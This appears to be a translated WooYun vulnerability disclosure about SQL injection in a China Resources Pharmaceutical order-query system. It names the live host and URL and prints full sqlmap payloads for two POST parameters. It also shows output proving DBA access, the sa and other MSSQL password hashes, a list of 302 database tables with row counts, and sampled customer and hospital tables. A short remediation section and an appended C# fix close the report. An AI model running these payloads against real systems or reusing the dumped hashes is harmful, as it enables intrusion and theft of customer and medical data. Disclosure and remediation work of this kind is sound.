Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0137183

Title: SQL injection in a China Resources Pharmaceutical Commercial Group (华润医药商业集团) system (administrator privileges)

Related vendor: China Resources Sanjiu Medical & Pharmaceutical Co., Ltd. (华润三九医药股份有限公司)

Author: Ysql404

Submitted: 2015-08-28 16:07

Fixed: 2015-10-16 23:24

Published: 2015-10-16 23:24

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-08-28: Details sent to the vendor, awaiting vendor handling
2015-09-01: Vendor confirmed; details disclosed to the vendor only
2015-09-11: Details disclosed to core white hats and domain experts
2015-09-21: Details disclosed to regular white hats
2015-10-01: Details disclosed to intern white hats
2015-10-16: Details disclosed to the public

Brief description:

China Resources Pharmaceutical Group Co., Ltd. is a large pharmaceutical manufacturing and distribution enterprise that China Resources (Holdings) Co., Ltd. established, in response to the SASAC requirement to "build a central-enterprise pharmaceutical platform", by restructuring the pharmaceutical assets of the central enterprises Huayuan Group and Sanjiu Group; it is the wholly owned vehicle through which China Resources consolidates and develops its domestic pharmaceutical business.

Detailed description:

Injection URL: http://1.202.246.5:8080/OrderDetialInfo.aspx
Injectable parameters: txtQOrder_CusPhone, txtQOrder_No
The order-query page should not be exposed to unauthorized users in the first place.

[Screenshot: QQ图片20150826182616.png]

[Screenshot: QQ图片20150826185858.png]


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txtQOrder_CusPhone
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447' AND 7013=CONVERT(INT,(SELECT CHAR(113) CHAR(103) CHAR(120) CHAR(121) CHAR(113) (SELECT (CASE WHEN (7013=7013) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(110) CHAR(107) CHAR(97) CHAR(113))) AND 'uCHz'='uCHz&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447'; WAITFOR DELAY '0:0:5'--&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333&txtQOrder_CusPhone=15909318447' WAITFOR DELAY '0:0:5'--&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Place: POST
Parameter: txtQOrder_No
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333' AND 9417=CONVERT(INT,(SELECT CHAR(113) CHAR(103) CHAR(120) CHAR(121) CHAR(113) (SELECT (CASE WHEN (9417=9417) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(110) CHAR(107) CHAR(97) CHAR(113))) AND 'NYjm'='NYjm&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTQ1NzE3NjI5MA9kFgICAw9kFgYCCw8PZBYCHgdPbkNsaWNrBTFmb3JtMS5pbnB1dHdpZHRoLnZhbHVlPWRvY3VtZW50LmJvZHkuY2xpZW50V2lkdGg7ZAJPDzwrAA0AZAJTD2QWAmYPZBYCAgEPZBYEZg9kFgICAQ9kFgICAQ8PFggeDEdldENoYXJ0RmlsZQUbUGFnZS9USE1hbmFnZS9HZXRDaGFydC5hc3B4HgZIZWlnaHQbAAAAAAAAWUABAAAAHgVXaWR0aBsAAAAAAOB1QAEAAAAeBF8hU0ICgANkZAIBD2QWAgIBD2QWAgIBDw8WCB8BBRtQYWdlL1RITWFuYWdlL0dldENoYXJ0LmFzcHgfAhsAAAAAAABZQAEAAAAfAxsAAAAAAOB1QAEAAAAfBAKAA2RkGAMFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYCBQ1UYWJDb250YWluZXIxBRdUYWJDb250YWluZXIxJFRQX1ckV0NfVwUNVGFiQ29udGFpbmVyMQ8PZGZkBQ9Hdk9yZGVyTGlzdEluZm8PZ2RLnEEzbTG1x7TBhM572wkzolvArg==&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333'; WAITFOR DELAY '0:0:5'--&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TabContainer1_ClientState={"ActiveTabIndex":0,"TabState":[true]}&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=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&__EVENTVALIDATION=/wEWBQKCzeDyCgKvkZ sAwLOqJSDDALvjry/BQLdrdWBC7j gnHa8fVQgX/2bE5j4M m/uEd&txtQOrder_No=201508251222333' WAITFOR DELAY '0:0:5'--&txtQOrder_CusPhone=15909318447&btnQuery=%E6%9F%A5 %E8%AF%A2&inputwidth=1600
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: txtQOrder_CusPhone, type: Single quoted string (default)
[1] place: POST, parameter: txtQOrder_No, type: Single quoted string
[q] Quit


Administrator privileges

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[17:07:48] [INFO] testing if current user is DBA
current user is DBA: True


database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
[17:08:13] [INFO] fetching database users password hashes
[17:08:13] [INFO] the SQL query used returns 3 entries
[17:08:13] [INFO] starting 3 threads
[17:08:13] [INFO] resumed: ##MS_PolicyEventProcessingLogin##
[17:08:13] [INFO] resumed: ##MS_PolicyTsqlExecutionLogin##
[17:08:13] [INFO] resumed: sa
[17:08:13] [INFO] retrieved: 0x01001d564a0be57513ab7b14df6772aa383c0867f4e9d5245d2d
[17:08:14] [INFO] retrieved: 0x0100bfb0cffb5f1daedb051380f8922c80d42241f836ed2aef8b
[17:08:14] [INFO] retrieved: 0x01004e7585c4bb3bdbd556505ed3541176bd329c22826c3f8b4b
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] n
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
password hash: 0x01001d564a0be57513ab7b14df6772aa383c0867f4e9d5245d2d
header: 0x0100
salt: 1d564a0b
mixedcase: e57513ab7b14df6772aa383c0867f4e9d5245d2d
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
password hash: 0x0100bfb0cffb5f1daedb051380f8922c80d42241f836ed2aef8b
header: 0x0100
salt: bfb0cffb
mixedcase: 5f1daedb051380f8922c80d42241f836ed2aef8b
[*] sa [1]:
password hash: 0x01004e7585c4bb3bdbd556505ed3541176bd329c22826c3f8b4b
header: 0x0100
salt: 4e7585c4
mixedcase: bb3bdbd556505ed3541176bd329c22826c3f8b4b


Databases

available databases [8]:
[*] CCDMP
[*] CCDMPTest
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


Tables

Database: CCDMP
[302 tables]
+-------------------------+
| Address_Info |
| Canal_Info |
| CmdQueue_Info |
| Customer_Info |
| Customer_Info_DELBAK |
| DDI_InboundQuery |
| DDI_SalesQuery |
| DDI_StockQuery |
| DTPCommissioner_Info |
| DTP_ERPSale |
| DTP_goodsinf |
| Department_Info |
| Deputy_Info |
| Distribution_Info |
| DrugsType_Info |
| Drugs_Info |
| ERPGOODS_INF |
| ERPHOSPITAL |
| ERPINFORMATION |
| ERPInbound_Info |
| ERPSHOP_INSTORE |
| ERPSTOCK |
| EnterBaseDrugs_Info |
| EnterDrugs_Info |
| EnterDrugs_Info_back |
| Enter_Info |
| EquipNavigationNow_Info |
| EquipNavigationOld_Info |
| EquipTrack_Info |
| EquipValidate_Head_Info |
| EquipValidate_Info |
| Equip_Info |
| Field_Info |
| HeartBeat |
| Hospital_Info |
| Inbound_Info |
| Inventory_Info |
| LOG_INFO |
| MAC_Info |
| MedicationDetail_Info |
| Menu_Info |
| News_Info |
| Node_Info |
| OD_P_Record |
| OD_Special |
| OD_information |
| Order_Head_Info |
| Order_Head_Info_0328 |
| Order_Head_Info_DEL_BAK |
| Order_Info |
| Order_List_Info |
| Order_List_Info_DEL_BAK |
| P_Record |
| P_Record_Sum |
| Page_Info |
| Price_Info |
| ProductClass_Info |
| ProductType_Info |
| RecipelRemind_Info |
| Role_Info |
| SHM_CY |
| SHM_DD |
| SHM_NSD |
| SHM_RGHZ |
| SHM_RGYY |
| SMSAccount_Info |
| SMS_Rev_Recorder |
| SMS_Send_Recorder |
| SaleRecord_Info |
| SaleRecord_Info_0328 |
| SaleRecord_Info_DELBAK |
| Scope_Info |
| Sequence |
| Stock_Info |
| StorageRoom_Info |
| StoreBaseDrugs_Info |
| StoreDrugs_Info |
| StoreDrugs_Info20130703 |
| StoreDrugs_Info20130729 |
| StuffType_Info |
| SupervisionCode_Info |
| SupervisionCode_NewInfo |
| Supplier_Info |
| THAlarmData_Info |
| THAlarmData_Info100 |
| THAlarmData_Info101 |
| THAlarmData_Info102 |
| THAlarmData_Info103 |
| THAlarmData_Info104 |
| THAlarmData_Info105 |
| THAlarmData_Info106 |
| THAlarmData_Info107 |
| THAlarmData_Info108 |
| THAlarmData_Info109 |
| THAlarmData_Info110 |
| THAlarmData_Info111 |
| THAlarmData_Info112 |
| THAlarmData_Info113 |
| THAlarmData_Info114 |
| THAlarmData_Info115 |
| THAlarmData_Info116 |
| THAlarmData_Info117 |
| THAlarmData_Info118 |
| THAlarmData_Info119 |
| THAlarmData_Info120 |
| THAlarmData_Info121 |
| THAlarmData_Info122 |
| THAlarmData_Info123 |
| THAlarmData_Info124 |
| THAlarmData_Info125 |
| THAlarmData_Info126 |
| THAlarmData_Info127 |
| THAlarmData_Info128 |
| THAlarmData_Info129 |
| THAlarmData_Info130 |
| THAlarmData_Info131 |
| THAlarmData_Info132 |
| THAlarmData_Info133 |
| THAlarmData_Info134 |
| THAlarmData_Info135 |
| THAlarmData_Info136 |
| THAlarmData_Info137 |
| THAlarmData_Info138 |
| THAlarmData_Info139 |
| THAlarmData_Info140 |
| THAlarmData_Info141 |
| THAlarmData_Info142 |
| THAlarmData_Info145 |
| THAlarmData_Info146 |
| THAlarmData_Info35 |
| THAlarmData_Info38 |
| THAlarmData_Info39 |
| THAlarmData_Info40 |
| THAlarmData_Info41 |
| THAlarmData_Info44 |
| THAlarmData_Info48 |
| THAlarmData_Info50 |
| THAlarmData_Info51 |
| THAlarmData_Info52 |
| THAlarmData_Info54 |
| THAlarmData_Info55 |
| THAlarmData_Info56 |
| THAlarmData_Info57 |
| THAlarmData_Info58 |
| THAlarmData_Info59 |
| THAlarmData_Info60 |
| THAlarmData_Info64 |
| THAlarmData_Info66 |
| THAlarmData_Info67 |
| THAlarmData_Info68 |
| THAlarmData_Info69 |
| THAlarmData_Info70 |
| THAlarmData_Info71 |
| THAlarmData_Info72 |
| THAlarmData_Info73 |
| THAlarmData_Info74 |
| THAlarmData_Info75 |
| THAlarmData_Info76 |
| THAlarmData_Info77 |
| THAlarmData_Info78 |
| THAlarmData_Info79 |
| THAlarmData_Info80 |
| THAlarmData_Info81 |
| THAlarmData_Info82 |
| THAlarmData_Info83 |
| THAlarmData_Info84 |
| THAlarmData_Info85 |
| THAlarmData_Info86 |
| THAlarmData_Info87 |
| THAlarmData_Info88 |
| THAlarmData_Info89 |
| THAlarmData_Info90 |
| THAlarmData_Info91 |
| THAlarmData_Info92 |
| THAlarmData_Info93 |
| THAlarmData_Info94 |
| THAlarmData_Info95 |
| THAlarmData_Info96 |
| THAlarmData_Info97 |
| THAlarmData_Info98 |
| THAlarmData_Info99 |
| THDataNow_Info |
| THDataOld_Info |
| THDataOld_Info100 |
| THDataOld_Info101 |
| THDataOld_Info102 |
| THDataOld_Info103 |
| THDataOld_Info104 |
| THDataOld_Info105 |
| THDataOld_Info106 |
| THDataOld_Info107 |
| THDataOld_Info108 |
| THDataOld_Info109 |
| THDataOld_Info110 |
| THDataOld_Info111 |
| THDataOld_Info112 |
| THDataOld_Info113 |
| THDataOld_Info114 |
| THDataOld_Info115 |
| THDataOld_Info116 |
| THDataOld_Info117 |
| THDataOld_Info118 |
| THDataOld_Info119 |
| THDataOld_Info120 |
| THDataOld_Info121 |
| THDataOld_Info122 |
| THDataOld_Info123 |
| THDataOld_Info124 |
| THDataOld_Info125 |
| THDataOld_Info126 |
| THDataOld_Info127 |
| THDataOld_Info128 |
| THDataOld_Info129 |
| THDataOld_Info130 |
| THDataOld_Info131 |
| THDataOld_Info132 |
| THDataOld_Info133 |
| THDataOld_Info134 |
| THDataOld_Info135 |
| THDataOld_Info136 |
| THDataOld_Info137 |
| THDataOld_Info138 |
| THDataOld_Info139 |
| THDataOld_Info140 |
| THDataOld_Info141 |
| THDataOld_Info142 |
| THDataOld_Info145 |
| THDataOld_Info146 |
| THDataOld_Info35 |
| THDataOld_Info38 |
| THDataOld_Info39 |
| THDataOld_Info40 |
| THDataOld_Info41 |
| THDataOld_Info44 |
| THDataOld_Info48 |
| THDataOld_Info50 |
| THDataOld_Info51 |
| THDataOld_Info52 |
| THDataOld_Info54 |
| THDataOld_Info55 |
| THDataOld_Info56 |
| THDataOld_Info57 |
| THDataOld_Info58 |
| THDataOld_Info59 |
| THDataOld_Info60 |
| THDataOld_Info64 |
| THDataOld_Info66 |
| THDataOld_Info67 |
| THDataOld_Info68 |
| THDataOld_Info69 |
| THDataOld_Info70 |
| THDataOld_Info71 |
| THDataOld_Info72 |
| THDataOld_Info73 |
| THDataOld_Info74 |
| THDataOld_Info75 |
| THDataOld_Info76 |
| THDataOld_Info77 |
| THDataOld_Info78 |
| THDataOld_Info79 |
| THDataOld_Info80 |
| THDataOld_Info81 |
| THDataOld_Info82 |
| THDataOld_Info83 |
| THDataOld_Info84 |
| THDataOld_Info85 |
| THDataOld_Info86 |
| THDataOld_Info87 |
| THDataOld_Info88 |
| THDataOld_Info89 |
| THDataOld_Info90 |
| THDataOld_Info91 |
| THDataOld_Info92 |
| THDataOld_Info93 |
| THDataOld_Info94 |
| THDataOld_Info95 |
| THDataOld_Info96 |
| THDataOld_Info97 |
| THDataOld_Info98 |
| THDataOld_Info99 |
| THDataOld_Info_back |
| THDataOld_Info_standard |
| THRecord_Info |
| UserDrugs_Info |
| UserPage_Info |
| UserRole_Info |
| UserSR_Info |
| User_Info |
| ValidateNode_Info |
| Visit_Info |
| aaaaa |
| d_accept |
| d_batsale |
| d_sale |
| d_store |
| information |
| njy_DDYY |
| price_infobak |
| shm |
| sysdiagrams |
| ybqx_buy |
| ybqx_price |
+-------------------------+


Row counts per table

Database: CCDMP
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.THDataOld_Info | 118152987 |
| dbo.THAlarmData_Info | 35430085 |
| dbo.THDataOld_Info130 | 12120666 |
| dbo.THDataOld_Info101 | 7099863 |
| dbo.THDataOld_Info122 | 6858860 |
| dbo.THDataOld_Info59 | 6529550 |
| dbo.THDataOld_Info80 | 6404923 |
| dbo.THDataOld_Info117 | 5979157 |
| dbo.THDataOld_Info126 | 5489651 |
| dbo.THDataOld_Info111 | 5449853 |
| dbo.THDataOld_Info73 | 5322715 |
| dbo.THDataOld_Info74 | 4916352 |
| dbo.THDataOld_Info92 | 4812170 |
| dbo.THDataOld_Info85 | 4717805 |
| dbo.THDataOld_Info68 | 4641865 |
| dbo.THDataOld_Info50 | 4627863 |
| dbo.THDataOld_Info35 | 4103525 |
| dbo.THAlarmData_Info59 | 4019693 |
| dbo.THDataOld_Info114 | 3649618 |
| dbo.THAlarmData_Info92 | 3130856 |
| dbo.THDataOld_Info66 | 3085026 |
| dbo.THDataOld_Info70 | 2818019 |
| dbo.THDataOld_Info56 | 2769260 |
| dbo.THAlarmData_Info101 | 2630018 |
| dbo.THDataOld_Info41 | 2188063 |
| dbo.THDataOld_Info121 | 2135919 |
| dbo.THDataOld_Info76 | 1959584 |
| dbo.THAlarmData_Info50 | 1826072 |
| dbo.THDataOld_Info58 | 1549921 |
| dbo.THAlarmData_Info76 | 1547915 |
| dbo.THAlarmData_Info80 | 1546071 |
| dbo.THDataOld_Info142 | 1431666 |
| dbo.THDataOld_Info51 | 1418512 |
| dbo.THDataOld_Info104 | 1291850 |
| dbo.THAlarmData_Info85 | 1275112 |
| dbo.THAlarmData_Info66 | 1264669 |
| dbo.THDataOld_Info125 | 1254613 |
| dbo.THAlarmData_Info111 | 1166330 |
| dbo.THAlarmData_Info122 | 1149449 |
| dbo.THAlarmData_Info114 | 1083765 |
| dbo.THAlarmData_Info70 | 991497 |
| dbo.THAlarmData_Info126 | 981989 |
| dbo.d_batsale | 968490 |
| dbo.THAlarmData_Info73 | 887400 |
| dbo.THAlarmData_Info35 | 880379 |
| dbo.THDataOld_Info129 | 860839 |
| dbo.THDataOld_Info134 | 839201 |
| dbo.THAlarmData_Info142 | 826102 |
| dbo.THAlarmData_Info58 | 792807 |
| dbo.THAlarmData_Info74 | 733190 |
| dbo.THAlarmData_Info130 | 732697 |
| dbo.THAlarmData_Info56 | 707536 |
| dbo.THAlarmData_Info68 | 692299 |
| dbo.THDataOld_Info96 | 634828 |
| dbo.THAlarmData_Info41 | 634166 |
| dbo.THAlarmData_Info51 | 624801 |
| dbo.THDataOld_Info40 | 617805 |
| dbo.THAlarmData_Info125 | 568474 |
| dbo.THAlarmData_Info96 | 504961 |
| dbo.THRecord_Info | 473961 |
| dbo.THAlarmData_Info134 | 431632 |
| dbo.THAlarmData_Info129 | 387905 |
| dbo.THDataOld_Info88 | 365029 |
| dbo.THAlarmData_Info121 | 322187 |
| dbo.DDI_StockQuery | 318938 |
| dbo.THAlarmData_Info117 | 310308 |
| dbo.THAlarmData_Info104 | 249920 |
| dbo.THAlarmData_Info88 | 227904 |
| dbo.StoreBaseDrugs_Info | 219772 |
| dbo.THAlarmData_Info40 | 216119 |
| dbo.d_sale | 154208 |
| dbo.THDataOld_Info_back | 148040 |
| dbo.SupervisionCode_Info | 127685 |
| dbo.d_accept | 109960 |
| dbo.EquipTrack_Info | 84449 |
| dbo.EnterBaseDrugs_Info | 67228 |
| dbo.ybqx_price | 56136 |
| dbo.LOG_INFO | 51086 |
| dbo.THDataOld_Info52 | 47554 |
| dbo.Inventory_Info | 43799 |
| dbo.SMS_Send_Recorder | 40540 |
| dbo.Order_List_Info | 39020 |
| dbo.Order_Head_Info | 37054 |
| dbo.SaleRecord_Info | 33014 |
| dbo.THDataOld_Info67 | 27637 |
| dbo.THDataOld_Info83 | 22209 |
| dbo.THDataOld_Info108 | 21842 |
| dbo.THAlarmData_Info52 | 20490 |
| dbo.THDataOld_Info146 | 18156 |
| dbo.THDataOld_Info82 | 18028 |
| dbo.THDataOld_Info145 | 17643 |
| dbo.Customer_Info | 17471 |
| dbo.THAlarmData_Info67 | 16173 |
| dbo.DDI_SalesQuery | 15377 |
| dbo.MedicationDetail_Info | 14483 |
| dbo.P_Record | 14159 |
| dbo.OD_P_Record | 13739 |
| dbo.ERPInbound_Info | 13712 |
| dbo.d_store | 13252 |
| dbo.THAlarmData_Info83 | 11497 |
| dbo.SaleRecord_Info_0328 | 10394 |
| dbo.THAlarmData_Info108 | 10337 |
| dbo.THDataOld_Info69 | 9530 |
| dbo.THAlarmData_Info145 | 8337 |
| dbo.THDataOld_Info81 | 8309 |
| dbo.Order_Head_Info_0328 | 7752 |
| dbo.Price_Info | 7474 |
| dbo.THAlarmData_Info146 | 6743 |
| dbo.THAlarmData_Info69 | 6515 |
| dbo.Drugs_Info | 4870 |
| dbo.THDataOld_Info109 | 4847 |
| dbo.Stock_Info | 4698 |
| dbo.Inbound_Info | 4689 |
| dbo.information | 4044 |
| dbo.P_Record_Sum | 3991 |
| dbo.EnterDrugs_Info_back | 3939 |
| dbo.OD_information | 3938 |
| dbo.ERPSTOCK | 3820 |
| dbo.ERPINFORMATION | 3463 |
| dbo.HeartBeat | 3329 |
| dbo.THAlarmData_Info82 | 3280 |
| dbo.SHM_RGHZ | 3161 |
| dbo.THDataOld_Info127 | 3037 |
| dbo.THAlarmData_Info127 | 2701 |
| dbo.THDataOld_Info107 | 2680 |
| dbo.THAlarmData_Info109 | 1835 |
| dbo.THDataOld_Info116 | 1828 |
| dbo.ERPSHOP_INSTORE | 1826 |
| dbo.THAlarmData_Info107 | 1644 |
| dbo.THAlarmData_Info81 | 1555 |
| dbo.THDataOld_Info119 | 1461 |
| dbo.DDI_InboundQuery | 1309 |
| dbo.THDataOld_Info128 | 1182 |
| dbo.THDataOld_Info115 | 1131 |
| dbo.THAlarmData_Info128 | 1117 |
| dbo.THDataOld_Info139 | 1089 |
| dbo.ybqx_buy | 812 |
| dbo.THAlarmData_Info119 | 774 |
| dbo.THAlarmData_Info116 | 688 |
| dbo.THDataOld_Info102 | 667 |
| dbo.EnterDrugs_Info | 616 |
| dbo.Hospital_Info | 576 |
| dbo.THAlarmData_Info139 | 573 |
| dbo.THDataNow_Info | 559 |
| dbo.SHM_DD | 459 |
| dbo.StoreDrugs_Info | 459 |
| dbo.CmdQueue_Info | 424 |
| dbo.Node_Info | 403 |
| dbo.THDataOld_Info64 | 387 |
| dbo.Address_Info | 385 |
| dbo.THDataOld_Info103 | 370 |
| dbo.ProductClass_Info | 343 |
| dbo.THAlarmData_Info64 | 331 |
| dbo.THAlarmData_Info115 | 292 |
| dbo.price_infobak | 287 |
| dbo.THAlarmData_Info102 | 267 |
| dbo.THDataOld_Info136 | 246 |
| dbo.THDataOld_Info71 | 231 |
| dbo.THAlarmData_Info71 | 218 |
| dbo.THDataOld_Info100 | 197 |
| dbo.User_Info | 192 |
| dbo.THAlarmData_Info75 | 188 |
| dbo.THDataOld_Info75 | 188 |
| dbo.UserRole_Info | 188 |
| dbo.DTP_goodsinf | 184 |
| dbo.ERPHOSPITAL | 184 |
| dbo.ERPGOODS_INF | 180 |
| dbo.THAlarmData_Info103 | 172 |
| dbo.MAC_Info | 155 |
| dbo.THDataOld_Info72 | 152 |
| dbo.SupervisionCode_NewInfo | 146 |
| dbo.StoreDrugs_Info20130703 | 144 |
| dbo.Department_Info | 139 |
| dbo.THAlarmData_Info136 | 135 |
| dbo.THAlarmData_Info72 | 118 |
| dbo.SHM_NSD | 102 |
| dbo.Equip_Info | 97 |
| dbo.StoreDrugs_Info20130729 | 92 |
| dbo.njy_DDYY | 90 |
| dbo.SHM_CY | 87 |
| dbo.Field_Info | 86 |
| dbo.THDataOld_Info118 | 82 |
| dbo.Enter_Info | 80 |
| dbo.Order_Head_Info_DEL_BAK | 76 |
| dbo.THAlarmData_Info79 | 75 |
| dbo.THDataOld_Info79 | 75 |
| dbo.THDataOld_Info99 | 69 |
| dbo.THAlarmData_Info99 | 64 |
| dbo.THAlarmData_Info100 | 61 |
| dbo.OD_Special | 49 |
| dbo.shm | 49 |
| dbo.ValidateNode_Info | 49 |
| dbo.THAlarmData_Info60 | 47 |
| dbo.THDataOld_Info60 | 47 |
| dbo.THAlarmData_Info118 | 46 |
| dbo.StuffType_Info | 43 |
| dbo.SHM_RGYY | 42 |
| dbo.EquipValidate_Info | 36 |
| dbo.StorageRoom_Info | 33 |
| dbo.ProductType_Info | 30 |
| dbo.EquipNavigationNow_Info | 26 |
| dbo.Order_List_Info_DEL_BAK | 23 |
| dbo.Role_Info | 23 |
| dbo.THDataOld_Info48 | 22 |
| dbo.DTPCommissioner_Info | 21 |
| dbo.aaaaa | 18 |
| dbo.SMSAccount_Info | 14 |
| dbo.THAlarmData_Info48 | 14 |
| dbo.Scope_Info | 13 |
| dbo.Sequence | 12 |
| dbo.SaleRecord_Info_DELBAK | 9 |
| dbo.Customer_Info_DELBAK | 8 |
| dbo.UserDrugs_Info | 6 |
| dbo.THAlarmData_Info57 | 4 |
| dbo.THDataOld_Info57 | 4 |
| dbo.UserPage_Info | 4 |
| dbo.Page_Info | 3 |
| dbo.Canal_Info | 1 |
| dbo.EquipValidate_Head_Info | 1 |
| dbo.Supplier_Info | 1 |
+-----------------------------+---------+


Proof of vulnerability:

A few of the information tables were sampled:
d_batsale: 968,490 rows; only 2 columns were viewed

[Screenshot: QQ图片20150826182342.png]

Customer_Info: customer information table
Hospital_Info: hospital information table, 576 rows
Address_Info: address table, 385 rows
User_Info: user table, 192 rows

Remediation:

Access control and input filtering.

Copyright notice: when reposting, credit the source Ysql404@WooYun (乌云)
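As an added example (not code from the report or from the affected system), the ASP.NET/C# snippet below shows the pattern that produces this class of bug, a query assembled by concatenating txtQOrder_No and txtQOrder_CusPhone into SQL text, beside a hardened version that applies the report's two remediation points: the query is parameterized and input is filtered, and the page refuses lookups that are not tied to an authenticated customer. The column names (OrderNo, CusPhone, Status), the session key CustomerPhone and the value patterns are assumptions; Order_Head_Info is a table name taken from the report.

```csharp
using System;
using System.Data;
using System.Data.SqlClient;
using System.Text.RegularExpressions;
using System.Web;

public static class OrderQuery
{
    // Vulnerable pattern (constructed for illustration): both form fields are pasted
    // straight into the SQL text, so a single quote in either value closes the string
    // literal and the remainder is executed as SQL. The error-based, stacked-query and
    // "WAITFOR DELAY" findings in the sqlmap output above all rely on exactly this.
    public static string BuildQueryUnsafe(string orderNo, string cusPhone)
    {
        return "SELECT OrderNo, CusPhone, Status FROM Order_Head_Info WHERE OrderNo = '"
               + orderNo + "' AND CusPhone = '" + cusPhone + "'";
    }

    // "Filtering" from the remediation: accept only the shapes these fields can take.
    // Patterns are assumptions modelled on the sample values in the report.
    private static readonly Regex OrderNoPattern = new Regex(@"^\d{1,20}$");
    private static readonly Regex PhonePattern = new Regex(@"^\d{11}$");

    public static bool IsWellFormed(string orderNo, string cusPhone)
    {
        return orderNo != null && cusPhone != null
               && OrderNoPattern.IsMatch(orderNo) && PhonePattern.IsMatch(cusPhone);
    }

    // "Access control" from the remediation: the page was reachable anonymously.
    // Require a logged-in session and only allow lookups for the phone number bound
    // to that session (the session key is an assumption).
    public static bool IsLookupAllowed(HttpSessionState session, string cusPhone)
    {
        var sessionPhone = session == null ? null : session["CustomerPhone"] as string;
        if (string.IsNullOrEmpty(sessionPhone))
            return false; // not authenticated
        return string.Equals(sessionPhone, cusPhone, StringComparison.Ordinal);
    }

    // Hardened query: the SQL text is a constant and user input travels as typed
    // parameters, so the driver never interprets it as SQL. Note that the sqlmap
    // session above shows "current user is DBA: True"; the connection passed in here
    // should use a low-privilege login with SELECT on this table only, never sa.
    public static DataTable QueryOrder(SqlConnection conn, string orderNo, string cusPhone)
    {
        const string sql =
            "SELECT OrderNo, CusPhone, Status FROM Order_Head_Info " +
            "WHERE OrderNo = @orderNo AND CusPhone = @cusPhone";
        using (var cmd = new SqlCommand(sql, conn))
        {
            cmd.Parameters.Add("@orderNo", SqlDbType.NVarChar, 20).Value = orderNo;
            cmd.Parameters.Add("@cusPhone", SqlDbType.NVarChar, 11).Value = cusPhone;
            var table = new DataTable();
            using (var reader = cmd.ExecuteReader())
            {
                table.Load(reader);
            }
            return table;
        }
    }
}
```

In the page handler, call IsWellFormed and IsLookupAllowed before QueryOrder and return a generic "not found" on either failure, so the response reveals neither SQL errors nor whether an order number exists.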


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmed: 2015-09-01 23:22

Vendor reply:

Thanks for the submission

Latest status:

None yet